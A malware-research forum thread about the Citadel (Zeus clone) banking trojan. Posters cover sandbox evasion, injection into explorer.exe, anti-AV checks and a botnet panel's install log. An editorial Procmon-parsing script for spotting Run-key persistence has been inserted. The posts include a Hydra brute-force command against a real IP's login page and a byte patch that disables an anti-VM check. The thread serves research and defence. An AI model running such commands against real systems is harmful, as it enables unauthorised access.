Page 4 of 20

Re: Citadel (Zeus clone)

Posted: Fri Jan 04, 2013 11:10 am
by EP_X0FF
Cassiel wrote: @ EP_X0FF

I have run the sample in my VM and I noticed some strange things. If I run it outside BSA it will set the autorun part, if I run it inside BSA it won't.
There are the "usual" registry changes but there is nothing being added to the run key. It is like it puts itself to sleep and then can no longer continue.
Probably its activity is restricted by the sandbox. Why do you want to run malware in a VM + Sandboxie?

Re: Citadel (Zeus clone)

Posted: Fri Jan 04, 2013 12:05 pm
by Buster_BSA
Cassiel wrote: @ EP_X0FF

I have run the sample in my VM and I noticed some strange things. If I run it outside BSA it will set the autorun part, if I run it inside BSA it won't.
There are the "usual" registry changes but there is nothing being added to the run key. It is like it puts itself to sleep and then can no longer continue.
Probably the malware is injecting code into a system process and then setting the autorun part from there. As Sandboxie does not allow injection into processes running outside the sandbox, the injection will fail, and so will the autorun.

Re: Citadel (Zeus clone)

Posted: Fri Jan 04, 2013 12:40 pm
by Cassiel
@ EP_X0FF

Well my idea was to use a VM with BSA in order to have a snapshot if things went wrong.
I tried Cuckoo also, however I like the reporting from BSA a lot more than Cuckoo's.

@ Buster_BSA

You are most likely right, I am going to check this with Procmon in order to see how the registry key is being set.


EDIT:

You are right, it is injecting into explorer and after that it is creating the autorun key.
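The behaviour Cassiel confirmed above (the dropper injects into explorer.exe, and it is the injected explorer.exe that writes the Run value) is exactly the pattern a Procmon filter should surface. The following is an added example, not code from the thread or from any of the tools mentioned in it: it reads a Procmon CSV export (the column names are Procmon's standard export columns), picks out RegSetValue events on Run/RunOnce keys, and flags writes attributed to a process that does not normally register startup entries for itself, or whose data points into a user-writable directory. The log lines, process names, PIDs and paths are constructed for the example, and the list of "injection host" processes is a heuristic assumption.

```python
import csv
import io
import re

# Constructed Procmon-style CSV export. The process names, PIDs and paths are
# illustrative only and are not taken from the thread or the Citadel sample.
SAMPLE_LOG = r'''Time of Day,Process Name,PID,Operation,Path,Result,Detail
11:02:13.001,sample.exe,1932,CreateFile,C:\Users\lab\AppData\Roaming\Ocil\ybyb.exe,SUCCESS,Desired Access: Generic Write
11:02:13.410,explorer.exe,1588,RegSetValue,HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Ocil,SUCCESS,"Type: REG_SZ, Length: 90, Data: C:\Users\lab\AppData\Roaming\Ocil\ybyb.exe"
11:02:14.000,svchost.exe,804,RegQueryValue,HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Domain,SUCCESS,"Type: REG_SZ, Length: 2, Data: "
11:02:15.200,setup.exe,2210,RegSetValue,HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Updater,SUCCESS,"Type: REG_SZ, Length: 68, Data: C:\Program Files\Vendor\updater.exe"
'''

# A value written directly under Run or RunOnce (32- or 64-bit view alike).
RUN_KEY = re.compile(r"\\Microsoft\\Windows\\CurrentVersion\\Run(?:Once)?\\[^\\]+$", re.IGNORECASE)
# Procmon puts the written string after "Data:" in the Detail column.
DATA_FIELD = re.compile(r"Data:\s*(.*)$")
# Locations an unprivileged dropper can write to; a Run entry pointing there is a red flag.
USER_WRITABLE = re.compile(r"\\(?:AppData|Temp|ProgramData)\\", re.IGNORECASE)
# Assumption (heuristic): these processes do not create Run entries on their own
# behalf, so a write attributed to one of them is the footprint of injected code.
INJECTION_HOSTS = {"explorer.exe", "svchost.exe", "winlogon.exe", "taskhost.exe"}


def parse_procmon_csv(text):
    """Return the CSV export as a list of dicts keyed by Procmon's column names."""
    return list(csv.DictReader(io.StringIO(text)))


def find_run_key_writes(rows):
    """Collect every RegSetValue on a Run/RunOnce value, with two triage signals."""
    findings = []
    for row in rows:
        if row["Operation"] != "RegSetValue" or not RUN_KEY.search(row["Path"]):
            continue
        match = DATA_FIELD.search(row["Detail"])
        data = match.group(1).strip() if match else ""
        proc = row["Process Name"].lower()
        findings.append({
            "time": row["Time of Day"],
            "process": proc,
            "pid": int(row["PID"]),
            "value": row["Path"],
            "data": data,
            # writer is a shell/system process: persistence set from injected code
            "writer_is_injection_host": proc in INJECTION_HOSTS,
            # target binary lives where an unprivileged dropper could have put it
            "data_in_user_writable_dir": bool(USER_WRITABLE.search(data)),
        })
    return findings


def score(finding):
    """Crude triage score: both signals together is what an injected dropper looks like."""
    return int(finding["writer_is_injection_host"]) + int(finding["data_in_user_writable_dir"])


if __name__ == "__main__":
    for f in find_run_key_writes(parse_procmon_csv(SAMPLE_LOG)):
        print(f"[{score(f)}] {f['process']}({f['pid']}) -> {f['value']} = {f['data']}")
```

On the constructed log the explorer.exe write scores 2 (system process writing a Run value that points into AppData), while the vendor installer's HKLM entry scores 0. Run it against a real Procmon export by replacing SAMPLE_LOG with the file contents; the same filter is what you would set up interactively in Procmon (Operation is RegSetValue, Path contains CurrentVersion\Run) before looking at which process actually performed the write.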

Re: Citadel (Zeus clone)

Posted: Fri Jan 04, 2013 2:32 pm
by Buster_BSA
Cassiel wrote: You are right, it is injecting into explorer and after that it is creating the autorun key.
I would like such injections to be done successfully so that BSA analysis can be more complete, but the thing depends on Sandboxie's restrictions. I am going to talk with Ronen about this and I will ask him if there is any workaround to solve the issue.

Re: Citadel (Zeus clone)

Posted: Mon Jan 21, 2013 10:10 am
by bsteo
Citadel 1.3.5.1 Rain Edition sample. It has some anti-VM and anti-AV functions; I couldn't run it under Comodo and didn't try manually, maybe someone will do it.

Re: Citadel (Zeus clone)

Posted: Mon Jan 21, 2013 2:36 pm
by EP_X0FF
exitthematrix wrote: Citadel 1.3.5.1 Rain Edition sample. It have some anti-VM
Not found. Except a lame trick with GetKeyboardLayoutList (patch two bytes @00418FC6 with nops) and another lame trick with
Code:
ROOT\SECURITYCENTERROOT\SECURITYCENTER2 SELECT * FROM%sWQL
Antivirus Product company Name display Name version Number Unknown Company:%s
Product:%s
Version:%s
Firewall Product 
Software\Microsoft\Windows\CurrentVersion\Uninstall
Publisher Display Name Display Version%u:%s|%s|%s
Code:
SafenSoft SysWatch  McAfee  McAfee Security Center  McAfee SecurityCenter   Symantec Client   Symantec Protection   Symantec Shared   Symantec Security   Norton Protection   Kaspersky Security  Kaspersky Anti-Virus  avast! Antivirus  AntiVir Desktop   AVG Monitor   AVG Service   AVG Security  ESET Security   ESET Antivirus  Microsoft Inspection  Microsoft Malware   Microsoft Security
+ http://www.kernelmode.info/forum/viewto ... 553#p17553

Patched Zeus result (full disclosure).
http://camas.comodo.com/cgi-bin/submit? ... f9856e4263

No matter how it is named - zeus, ice-ix, citadel - it is all the same slavik shit.

Re: Citadel (Zeus clone)

Posted: Mon Jan 21, 2013 4:46 pm
by bsteo
Thank you very much for the tips and help :)

Re: Citadel (Zeus clone)

Posted: Mon Jan 21, 2013 5:08 pm
by Xylitol
Code:
• dns: 1 ›› ip: 62.109.1.7 - adresse: CITAB-TEST.TK
http://62.109.1.7/net/panel.php?m=login
Code:
http://62.109.1.7/net/install/
• [0] - Connecting to MySQL as 'citab-test'.
• [0] - Selecting DB 'citab-test'.
• [0] - Updating table 'botnet_list'.
• [0] - Creating table 'botnet_reports'.
• [0] - Updating table 'botnet_reports_130119'.
• [0] - Filling table 'ipv4toc'.
• [0] - Creating table 'ipv4toc'.
• [3] - Updating table 'cp_users'.
• [3] - Updating table 'botnet_scripts'.
• [3] - Updating table 'botnet_scripts_stat'.
• [3] - Updating table 'botnet_software_stat'.
• [3] - Updating table 'exe_updates'.
• [3] - Updating table 'exe_updates_crypter'.
• [3] - Updating table 'accparse_rules'.
• [3] - Updating table 'accparse_accounts'.
• [3] - Updating table 'vnc_bot_connections'.
• [3] - Updating table 'jabber_messages'.
• [3] - Updating table 'botnet_screenshots'.
• [3] - Updating table 'botnet_rep_favorites'.
• [3] - Updating table 'botnet_activity'.
• [3] - Updating table 'botnet_webinjects_group'.
• [3] - Updating table 'botnet_webinjects_group_perms'.
• [3] - Updating table 'botnet_webinjects'.
• [3] - Updating table 'botnet_webinjects_bundle'.
• [3] - Updating table 'botnet_webinjects_bundle_execlim'.
• [3] - Updating table 'botnet_webinjects_bundle_members'.
• [3] - Updating table 'botnet_webinjects_history'.
• [3] - Creating folder '_logos'.
• [3] - Writing config file
• [3] - Searching for the god particle...
• [3] - Creating folder 'system/data'.
• [3] - Creating folder 'public'.
• [3] - Creating folder 'files'.
• [3] - Creating folder 'files/webinjects'.
-- Update complete! --
EP_X0FF wrote: No matter how it named - zeus, ice-ix, citadel it all the same slavik shit.
Code:
-l admin -P pwd.lst -s 80 -w 64 -f -V 62.109.1.7 http-post-form "/net/panel.php?m=login:user=admin&pass=^PASS^:Bad user name or password."
And it's the same command for brute-forcing Zeus, Ice9 and Citadel.

Re: Citadel (Zeus clone)

Posted: Mon Jan 21, 2013 6:59 pm
by bsteo
If someone needs the PHP admin panel of this slavik mod shit, let me know and I can upload it.

Re: Citadel (Zeus clone)

Posted: Sat Feb 02, 2013 10:27 am
by R136a1
Seems like Citadel is the new favorite toy of some criminal gangs targeting government organizations:

McAfee Blog: http://blogs.mcafee.com/mcafee-labs/lab ... del-trojan

HitmanPro Blog: https://hitmanpro.wordpress.com/2013/02 ... onnection/